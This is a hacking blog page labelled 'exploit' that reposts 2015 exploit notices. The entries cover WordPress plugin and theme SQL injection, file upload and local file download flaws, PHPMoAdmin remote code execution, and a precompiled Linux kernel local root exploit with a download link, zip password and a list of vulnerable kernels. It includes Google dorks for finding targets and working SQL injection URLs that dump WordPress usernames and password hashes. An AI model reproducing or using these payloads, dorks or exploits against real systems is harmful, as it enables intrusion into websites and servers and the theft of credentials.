Just Educational Purpose Only For Pentesters And Developers

Showing posts with label exploit. Show all posts

Thursday, August 20, 2015

up.time 7.5.0 Upload And Execute File Exploit

up.time 7.5.0 Superadmin Privilege Escalation Exploit

Wednesday, April 15, 2015

WordPress Video Gallery 2.8 SQL Injection Vulnerability


Via-> Homelab.it

WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Via---> Homelab.it

Tuesday, March 31, 2015

Local Root Exploit For Linux Kernel 2.6.32 (precompile)

http://adf.ly/1CSLMg


Note:
It's a pre-compiled exploit and has been verified on the listed servers. It might work on other 2.6.32-X kernels too, so test it and update us in the comments. Thanks.
The following is the list of vulnerable kernels which can be rooted with our exploit.

Vulnerable Kernels:
Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64
Linux localhost.domain 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC 2013 x86_64
Linux localhost.domain 2.6.32-279.19.1.el6.x86_64 #1 SMP Wed Dec 19 07:05:20 UTC 2012 x86_64
Linux localhost.domain 2.6.32-279.22.1.el6.x86_64 #1 SMP Wed Feb 6 03:10:46 UTC 2013 x86_64
Linux localhost.domain 3.2.2-ipprojects #4 SMP Fri Feb 3 15:53:51 CET 2012 x86_64
Linux localhost.domain 2.6.32-042stab076.5 #1 SMP Mon Mar 18 20:41:34 MSK 2013 x86_64
Linux localhost.domain 2.6.32-220.4.1.el6.x86_64 #1 SMP Tue Jan 24 02:13:44 GMT 2012 x86_64
Linux localhost.domain 2.6.32-379.22.1.lve1.2.17.el6.x86_64 #1 SMP Wed Apr 3 12:05:42 EEST 2013 x86_64
Linux localhost.domain 2.6.32-042stab068.8 #1 SMP Fri Dec 7 17:06:14 MSK 2012 x86_64
Linux localhost.domain 2.6.32-379.22.1.lve1.2.14.el6.x86_64 #1 SMP Wed Mar 6 15:12:30 EET 2013 x86_64
Linux localhost.domain 2.6.32-379.19.1.lve1.2.6.el6.x86_64 #1 SMP Fri Jan 18 10:16:30 EST 2013 x86_64
Linux localhost.domain 2.6.32-042stab053.5 #1 SMP Tue Mar 27 11:42:17 MSD 2012 x86_64
Linux localhost.domain 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64
Linux localhost.domain 3.2.0-0.bpo.3-amd64 #1 SMP Thu Aug 23 07:41:30 UTC 2012 x86_64
Linux localhost.domain 2.6.32-358.0.1.el6.x86_64 #1 SMP Wed Feb 27 06:06:45 UTC 2013 x86_64
Linux localhost.domain 2.6.32-042stab061.2 #1 SMP Fri Aug 24 09:07:21 MSK 2012 x86_64
Linux localhost.domain 2.6.32-379.14.1.lve1.1.9.9.el6.x86_64 #1 SMP Thu Dec 6 07:12:24 EST 2012 x86_64
Linux localhost.domain 2.6.32-12-pve #1 SMP Tue May 15 06:02:20 CEST 2012 x86_64
Linux localhost.domain 2.6.32-131.21.1.el6.x86_64 #1 SMP Tue Nov 22 19:48:09 GMT 2011 x86_64
Linux localhost.domain 3.2.7 #1 SMP Sun Feb 26 23:00:18 CET 2012 x86_64
Linux localhost.domain 2.6.32-279.14.1.el6.x86_64 #1 SMP Tue Nov 6 23:43:09 UTC 2012 x86_64
Linux localhost.domain 2.6.32-379.22.1.lve1.2.17.el5h.x86_64 #1 SMP Wed Apr 3 14:28:52 EEST 2013 x86_64
Linux localhost.domain 2.6.32-320.4.1.lve1.1.4.el6.x86_64 #1 SMP Wed Mar 7 06:32:27 EST 2012 x86_64
Linux localhost.domain 2.6.32-220.7.1.el6.x86_64 #1 SMP Wed Mar 7 00:52:02 GMT 2012 x86_64
Linux localhost.domain 2.6.32-7-pve #1 SMP Mon Feb 13 07:33:21 CET 2012 x86_64
Linux localhost.domain 2.6.32-042stab062.2 #1 SMP Wed Oct 10 18:28:35 MSK 2012 x86_64
Linux localhost.domain 2.6.38 #5 SMP Sat Mar 19 13:19:08 CET 2011 x86_64
Linux localhost.domain 2.6.32 #1 SMP Wed Sep 5 22:46:20 MSK 2012 x86_64
Linux localhost.domain 2.6.32-379.19.1.lve1.2.7.el6.x86_64 #1 SMP Wed Jan 23 14:53:41 EST 2013 x86_64
Linux localhost.domain 3.2.0-0.bpo.2.dar-amd64 #1 SMP Fri Apr 27 18:23:24 MSK 2012 x86_64
Linux localhost.domain 2.6.32-16-pve #1 SMP Fri Nov 9 11:42:51 CET 2012 x86_64
Linux localhost.domain 2.6.32-220.17.1.el6.x86_64 #1 SMP Wed May 16 00:01:37 BST 2012 x86_64
Linux localhost.domain 2.6.32-279.9.1.el6.x86_64 #1 SMP Tue Sep 25 21:43:11 UTC 2012 x86_64
Linux localhost.domain 2.6.32-042stab065.3 #1 SMP Mon Nov 12 21:59:14 MSK 2012 x86_64
Linux localhost.domain 2.6.32-279.5.2.el6.x86_64 #1 SMP Fri Aug 24 01:07:11 UTC 2012 x86_64
Linux localhost.domain 2.6.32-11-pve #1 SMP Wed Apr 11 07:17:05 CEST 2012 x86_64
Linux localhost.domain 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64
Linux localhost.domain 2.6.32-131.17.1.el6.x86_64 #1 SMP Thu Oct 6 19:24:09 BST 2011 x86_64
Linux localhost.domain 2.6.32-042stab072.10 #1 SMP Wed Jan 16 18:54:05 MSK 2013 x86_64
Linux localhost.domain 3.5.2 #1 SMP Thu Aug 23 17:07:20 CEST 2012 x86_64
Linux localhost.domain 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22 GMT 2011 x86_64
Linux localhost.domain 2.6.32-279.2.1.el6.x86_64 #1 SMP Fri Jul 20 01:55:29 UTC 2012 x86_64
Linux localhost.domain 3.2.20 #1 SMP Tue Aug 28 02:39:06 MSK 2012 x86_64
Linux localhost.domain 2.6.32-220.4.2.el6.x86_64 #1 SMP Tue Feb 14 04:00:16 GMT 2012 x86_64
Linux localhost.domain 2.6.32-279.5.1.el6.x86_64 #1 SMP Tue Aug 14 23:54:45 UTC 2012 x86_64
Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64 GNU/Linux 
 Download here
Zip Password: *pakmadhunters* 
credit to  owner :)

Wednesday, March 18, 2015

Wordpress Plugin Reflex Gallery - Arbitrary File Upload

Via-> intelligentexploit

Thursday, March 5, 2015

WordPress Theme Photocrati 4.X.X SQL Injection



# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ] 
 
details |
=======================================================
Software : photocrati
version : 4.X.X
Risk : High
remote : yes

An attacker can perform a remote injection in the site URL to get some sensitive information.
=======================================================
 

PHPMoAdmin Remote Code Execution

######################################################################
#  _     ___  _   _  ____  ____    _  _____
#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
#  | |  | | | |  \| | |  _| |     / _ \ | |
#  | |__| |_| | |\  | |_| | |___ / ___ \| |
#  |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# PHPMoAdmin Unauthorized Remote Code Execution (0-Day)
# Website : http://www.phpmoadmin.com/
# Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
# Release dates : March 3, 2015
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################
 
[+] Description
============================================================
PHPMoAdmin is a MongoDB administration tool for PHP built on a
stripped-down version of the Vork high-performance framework.
 

WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]

# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9  [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
# CVE : CWE-89
# OWASP Top10: A1-Injection
 
Google Dork-> /wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=
 
define('FETCH_PREFIX_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=
1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME
(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name
%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,
%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0');
 
define('FETCH_USERS_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=
2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR
(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR
(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup
%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');
 

Friday, February 27, 2015

Wordpress force download Local File Download

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title: Wordpress force download  Local File Download
[+]
[+] Exploit Author: Ashiyane Digital Security Team , Milad Hacking
[+]
[+] Date: 2015-02-22
[+]
[+] Google Dork 1 : inurl:wp-content inurl:force-download.php?file=
[+]
[+] Vendor Homepage : http://elouai.com/force-download.php
[+]
[+] Tested on:  Kali , Mozilla FireFox
[+]
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+]  Location : [localhost]/patch/force-download.php?file=[LFD]
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Demo :
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Discovered By : Milad Hacking , Iliya Norton

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+]   Special Tnx To Admin   , packetstormsecurity.com
[+]
[+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] 
 
Via-> intelligentexploit.com